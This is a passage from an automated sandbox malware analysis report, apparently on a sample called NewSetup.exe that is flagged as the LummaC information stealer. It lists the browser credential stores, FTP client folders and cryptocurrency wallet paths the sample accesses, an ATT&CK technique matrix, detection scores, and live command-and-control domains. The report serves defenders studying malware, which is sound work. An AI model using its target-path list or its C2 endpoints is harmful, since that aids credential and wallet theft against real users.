              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: Yara matchFile source: Process Memory Space: NewSetup.exe PID: 5680, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: NewSetup.exe PID: 5680, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		211
              Process Injection              		21
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		211
              Process Injection              		LSASS Memory241
              Security Software Discovery              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets11
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials33
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              NewSetup.exe37%ReversingLabsWin32.Packed.Generic
              NewSetup.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://stingyerasjhru.click:443/apiicrosoft0%Avira URL Cloudsafe
              https://stingyerasjhru.click/gT0%Avira URL Cloudsafe
              https://stingyerasjhru.click/api50%Avira URL Cloudsafe
              https://stingyerasjhru.click:443/api0%Avira URL Cloudsafe
              https://stingyerasjhru.click/apif#0%Avira URL Cloudsafe
              https://stingyerasjhru.click/90%Avira URL Cloudsafe
              https://stingyerasjhru.click/api0%Avira URL Cloudsafe
              https://stingyerasjhru.click/CTb0%Avira URL Cloudsafe
              https://stingyerasjhru.click/api:0%Avira URL Cloudsafe
              stingyerasjhru.click0%Avira URL Cloudsafe
              https://stingyerasjhru.click/0%Avira URL Cloudsafe
              https://stingyerasjhru.click/apil60%Avira URL Cloudsafe
              https://stingyerasjhru.click/m0%Avira URL Cloudsafe
              https://stingyerasjhru.click/b0%Avira URL Cloudsafe
              https://stingyerasjhru.click/l0%Avira URL Cloudsafe
              https://stingyerasjhru.click:443/apiault-release/key4.dbPK0%Avira URL Cloudsafe
              https://stingyerasjhru.click/bUT0%Avira URL Cloudsafe
              https://stingyerasjhru.click/l8T0%Avira URL Cloudsafe
              https://stingyerasjhru.click/a0%Avira URL Cloudsafe
              https://stingyerasjhru.click/e&TI0%Avira URL Cloudsafe
              https://stingyerasjhru.click/nT0%Avira URL Cloudsafe
              https://stingyerasjhru.click/apiox0%Avira URL Cloudsafe
              https://stingyerasjhru.click/apiJa0%Avira URL Cloudsafe
              https://stingyerasjhru.click/s0%Avira URL Cloudsafe
              https://stingyerasjhru.click/apiok0%Avira URL Cloudsafe
              https://stingyerasjhru.click/apiT0%Avira URL Cloudsafe
              https://stingyerasjhru.click/p0%Avira URL Cloudsafe
              https://stingyerasjhru.click/lJTm0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              stingyerasjhru.click
              		172.67.157.249
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                scentniej.buzzfalse
                  		high
                  https://stingyerasjhru.click/apitrue
                  • Avira URL Cloud: safe
                  		unknown
                  stingyerasjhru.clicktrue
                  • Avira URL Cloud: safe
                  		unknown
                  hummskitnj.buzzfalse
                    		high
                    rebuildeso.buzzfalse
                      		high
                      appliacnesot.buzzfalse
                        		high
                        screwamusresz.buzzfalse
                          		high
                          cashfuzysao.buzzfalse
                            		high
                            inherineau.buzzfalse
                              		high
                              prisonyfork.buzzfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabNewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.entrust.net03NewSetup.exefalse
                                      		high
                                      https://stingyerasjhru.click/gTNewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ocsp.entrust.net02NewSetup.exefalse
                                        		high
                                        https://stingyerasjhru.click/api5NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://stingyerasjhru.click:443/apiicrosoftNewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://stingyerasjhru.click/api:NewSetup.exe, 00000003.00000003.2167294440.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_NewSetup.exe, 00000003.00000002.2323001523.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292481994.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://stingyerasjhru.click/apif#NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgNewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://stingyerasjhru.click:443/apiNewSetup.exe, NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.0000000003434000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.0000000003431000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://stingyerasjhru.click/9NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://x1.c.lencr.org/0NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://x1.i.lencr.org/0NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&NewSetup.exe, 00000003.00000002.2323001523.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292481994.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://stingyerasjhru.click/CTbNewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://stingyerasjhru.click/NewSetup.exe, 00000003.00000003.2240923981.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2241770608.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2216181199.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2215827974.00000000059F1000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243516642.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292228266.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2317817416.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240412235.00000000059F3000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243756050.0000000005A01000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240356091.0000000003467000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2215760956.000000000346A000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2217240190.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275417498.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.entrust.net/ts1ca.crl0NewSetup.exefalse
                                                        		high
                                                        https://support.mozilla.org/products/firefoxgro.allNewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.mozilla.orNewSetup.exe, 00000003.00000003.2217185269.0000000005A31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoNewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://stingyerasjhru.click/apil6NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.entrust.net/rpa03NewSetup.exefalse
                                                                  		high
                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiNewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://aia.entrust.net/ts1-chain256.cer01NewSetup.exefalse
                                                                      		high
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://stingyerasjhru.click/lNewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://stingyerasjhru.click/mNewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://ocsp.rootca1.amazontrust.com0:NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://stingyerasjhru.click/l8TNewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://stingyerasjhru.click/bNewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.ecosia.org/newtab/NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brNewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://stingyerasjhru.click/bUTNewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2241164394.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://stingyerasjhru.click:443/apiault-release/key4.dbPKNewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.0000000003434000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.0000000003431000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://stingyerasjhru.click/aNewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://stingyerasjhru.click/e&TINewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://ac.ecosia.org/autocomplete?q=NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://stingyerasjhru.click/apioxNewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://stingyerasjhru.click/nTNewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgNewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://stingyerasjhru.click/sNewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3NewSetup.exe, 00000003.00000003.2240282371.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://stingyerasjhru.click/pNewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://stingyerasjhru.click/apiJaNewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://stingyerasjhru.click/apiTNewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://stingyerasjhru.click/apiokNewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
